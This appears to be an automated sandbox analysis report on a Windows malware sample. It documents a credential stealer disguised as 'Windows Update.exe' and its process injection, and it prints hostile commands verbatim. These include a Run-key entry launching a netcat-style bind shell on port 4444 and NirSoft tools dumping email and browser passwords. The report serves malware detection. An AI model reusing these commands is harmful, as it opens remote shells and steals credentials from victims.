Analysis
-
max time kernel
149s -
max time network
184s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 15:41
Static task
static1
Behavioral task
behavioral1
Sample
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe
Resource
win10v2004-20221111-en
General
-
Target
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe
-
Size
706KB
-
MD5
e94cbe2bdc40efd475a5d46dc96a3620
-
SHA1
b7afdd1a29609fc0bc362650acbfd2ed703cc642
-
SHA256
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470
-
SHA512
62eba886982781d2fa604de808b12ceadb79850ed323bddac88900b8d8d9c9da5ed658bc197accbb25e9631d5eb192a5e43e143dbca4e4f26acfa2e62f3b6059
-
SSDEEP
12288:rLoWMMMMMMMMMMMMMMMMMMEMMMMMMMMMMMMMMMMMMAHMMMMMMMMMMMMMMMMMMeye:RMMMMMMMMMMMMMMMMMMEMMMMMMMMMMMR
Malware Config
Signatures
-
NirSoft MailPassView 9 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe MailPassView C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe MailPassView C:\Users\Admin\AppData\Roaming\Windows Update.exe MailPassView C:\Users\Admin\AppData\Roaming\Windows Update.exe MailPassView C:\WINDOWS\SysWOW64\me.exe MailPassView behavioral2/memory/5044-153-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/5044-152-0x0000000000000000-mapping.dmp MailPassView behavioral2/memory/5044-155-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView behavioral2/memory/5044-157-0x0000000000400000-0x000000000041B000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 10 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe WebBrowserPassView C:\Users\Admin\AppData\Roaming\Windows Update.exe WebBrowserPassView C:\Users\Admin\AppData\Roaming\Windows Update.exe WebBrowserPassView C:\WINDOWS\SysWOW64\me.exe WebBrowserPassView behavioral2/memory/4856-158-0x0000000000000000-mapping.dmp WebBrowserPassView behavioral2/memory/4856-159-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4856-161-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4856-163-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView behavioral2/memory/4856-164-0x0000000000400000-0x0000000000458000-memory.dmp WebBrowserPassView -
Nirsoft 14 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe Nirsoft C:\Users\Admin\AppData\Roaming\Windows Update.exe Nirsoft C:\Users\Admin\AppData\Roaming\Windows Update.exe Nirsoft C:\WINDOWS\SysWOW64\me.exe Nirsoft behavioral2/memory/5044-153-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/5044-152-0x0000000000000000-mapping.dmp Nirsoft behavioral2/memory/5044-155-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/5044-157-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft behavioral2/memory/4856-158-0x0000000000000000-mapping.dmp Nirsoft behavioral2/memory/4856-159-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4856-161-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4856-163-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft behavioral2/memory/4856-164-0x0000000000400000-0x0000000000458000-memory.dmp Nirsoft -
Executes dropped EXE 3 IoCs
Processes:
me.exeWindows Update.exeme2.exepid process 1608 me.exe 1992 Windows Update.exe 4724 me2.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
me.exeme2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation me.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation me2.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exereg.exeWindows Update.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nc = "C:\\Windows\\system32\\me.exe -L -d -p 4444 -t -e cmd.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" Windows Update.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 46 whatismyipaddress.com -
Drops file in System32 directory 5 IoCs
Processes:
me2.exedescription ioc process File created C:\WINDOWS\SysWOW64\__tmp_rar_sfx_access_check_240621421 me2.exe File created C:\WINDOWS\SysWOW64\me.exe me2.exe File opened for modification C:\WINDOWS\SysWOW64\me.exe me2.exe File created C:\WINDOWS\SysWOW64\run.bat me2.exe File opened for modification C:\WINDOWS\SysWOW64\run.bat me2.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Windows Update.exedescription pid process target process PID 1992 set thread context of 5044 1992 Windows Update.exe vbc.exe PID 1992 set thread context of 4856 1992 Windows Update.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 2356 ipconfig.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
vbc.exeWindows Update.exepid process 4856 vbc.exe 4856 vbc.exe 1992 Windows Update.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Windows Update.exedescription pid process Token: SeDebugPrivilege 1992 Windows Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Windows Update.exepid process 1992 Windows Update.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exeme.exeme2.execmd.exeWindows Update.exedescription pid process target process PID 1788 wrote to memory of 1608 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me.exe PID 1788 wrote to memory of 1608 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me.exe PID 1788 wrote to memory of 1608 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me.exe PID 1608 wrote to memory of 1992 1608 me.exe Windows Update.exe PID 1608 wrote to memory of 1992 1608 me.exe Windows Update.exe PID 1608 wrote to memory of 1992 1608 me.exe Windows Update.exe PID 1788 wrote to memory of 4724 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me2.exe PID 1788 wrote to memory of 4724 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me2.exe PID 1788 wrote to memory of 4724 1788 e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe me2.exe PID 4724 wrote to memory of 4560 4724 me2.exe cmd.exe PID 4724 wrote to memory of 4560 4724 me2.exe cmd.exe PID 4724 wrote to memory of 4560 4724 me2.exe cmd.exe PID 4560 wrote to memory of 3228 4560 cmd.exe reg.exe PID 4560 wrote to memory of 3228 4560 cmd.exe reg.exe PID 4560 wrote to memory of 3228 4560 cmd.exe reg.exe PID 4560 wrote to memory of 2356 4560 cmd.exe ipconfig.exe PID 4560 wrote to memory of 2356 4560 cmd.exe ipconfig.exe PID 4560 wrote to memory of 2356 4560 cmd.exe ipconfig.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 5044 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe PID 1992 wrote to memory of 4856 1992 Windows Update.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe"C:\Users\Admin\AppData\Local\Temp\e08e9c7d4571cc271e0b364498260ff4655e381a34aa5bb76f73914e13fe9470.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Roaming\Windows Update.exe"C:\Users\Admin\AppData\Roaming\Windows Update.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"4⤵
- Accesses Microsoft Outlook accounts
PID:5044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me2.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\me2.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\WINDOWS\system32\run.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\WINDOWS\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "C:\Windows\system32\me.exe -L -d -p 4444 -t -e cmd.exe"4⤵
- Adds Run key to start application
- Modifies registry key
PID:3228 -
C:\WINDOWS\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:2356
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
521KB
MD516045bfd13c7c17e5fc6e92c2686adb1
SHA1447bb812f69fe09334d6a77ed72689c263326488
SHA256e003ee4c15c5cfac60aee2499613fe04ab4ba8e67592d817115fee85d17f2523
SHA5125ba5990926373da33f92ed53c0321e90567e8a611c1011fb5ba5c55852229ee028f273172eeebb276195702327c13f071c335ef613bf55aeefe3e6cef1f969f9
-
Filesize
521KB
MD516045bfd13c7c17e5fc6e92c2686adb1
SHA1447bb812f69fe09334d6a77ed72689c263326488
SHA256e003ee4c15c5cfac60aee2499613fe04ab4ba8e67592d817115fee85d17f2523
SHA5125ba5990926373da33f92ed53c0321e90567e8a611c1011fb5ba5c55852229ee028f273172eeebb276195702327c13f071c335ef613bf55aeefe3e6cef1f969f9
-
Filesize
351KB
MD52250ef4bfb1d96ed3e17223e605e6d39
SHA1e342cacb81c1b453d8765a5e08a01671fd31756f
SHA256804db0aa7edbf0c884b2b59453b521714c2540922d6e01709158b9f1ceee494e
SHA512fa60a06bcb031f17629d06df19f9ef77da1042c8ac926e7ae5b216d21e55234812c4b4110a9ea9acacab86157349023fdeddc8372a1b14a5c4865a5f81583662
-
Filesize
351KB
MD52250ef4bfb1d96ed3e17223e605e6d39
SHA1e342cacb81c1b453d8765a5e08a01671fd31756f
SHA256804db0aa7edbf0c884b2b59453b521714c2540922d6e01709158b9f1ceee494e
SHA512fa60a06bcb031f17629d06df19f9ef77da1042c8ac926e7ae5b216d21e55234812c4b4110a9ea9acacab86157349023fdeddc8372a1b14a5c4865a5f81583662
-
Filesize
51B
MD52d17e6031cc679f870c396621e9172da
SHA16a194f0fba26bd6de0d736b3aa46ff64c8030153
SHA25614848e58b77b4147ec5f9ead8e4647de177dc4a106681566db4808a1bc638d8a
SHA512053b0c0a51f3eb6f2079aed33da6d9d68d9c266881a3fd8d45143ac66bd491d31fafbcb0309717029cc67644a30badbaec0c0a6de851eb9c25105f0225c2e16f
-
Filesize
3KB
MD5f94dc819ca773f1e3cb27abbc9e7fa27
SHA19a7700efadc5ea09ab288544ef1e3cd876255086
SHA256a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA51272a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196
-
Filesize
521KB
MD516045bfd13c7c17e5fc6e92c2686adb1
SHA1447bb812f69fe09334d6a77ed72689c263326488
SHA256e003ee4c15c5cfac60aee2499613fe04ab4ba8e67592d817115fee85d17f2523
SHA5125ba5990926373da33f92ed53c0321e90567e8a611c1011fb5ba5c55852229ee028f273172eeebb276195702327c13f071c335ef613bf55aeefe3e6cef1f969f9
-
Filesize
521KB
MD516045bfd13c7c17e5fc6e92c2686adb1
SHA1447bb812f69fe09334d6a77ed72689c263326488
SHA256e003ee4c15c5cfac60aee2499613fe04ab4ba8e67592d817115fee85d17f2523
SHA5125ba5990926373da33f92ed53c0321e90567e8a611c1011fb5ba5c55852229ee028f273172eeebb276195702327c13f071c335ef613bf55aeefe3e6cef1f969f9
-
Filesize
521KB
MD516045bfd13c7c17e5fc6e92c2686adb1
SHA1447bb812f69fe09334d6a77ed72689c263326488
SHA256e003ee4c15c5cfac60aee2499613fe04ab4ba8e67592d817115fee85d17f2523
SHA5125ba5990926373da33f92ed53c0321e90567e8a611c1011fb5ba5c55852229ee028f273172eeebb276195702327c13f071c335ef613bf55aeefe3e6cef1f969f9
-
Filesize
473B
MD5a8f58fb20c4f24b6300941d726a0324f
SHA1c832a7c76dbf0b2ff31730d6bd5a4bdeac4094be
SHA25603a010d924d0d0b69f0cb8c54cabe4041838189271155724e3d213d9dd8e3171
SHA5126814e90c139573f94077d7edba0926e0c446c1592087b9c46610873f8a49d85153d28fdf08e053b123ea4a5487aecb51411a8c49cc4551661cb231e7cf515f15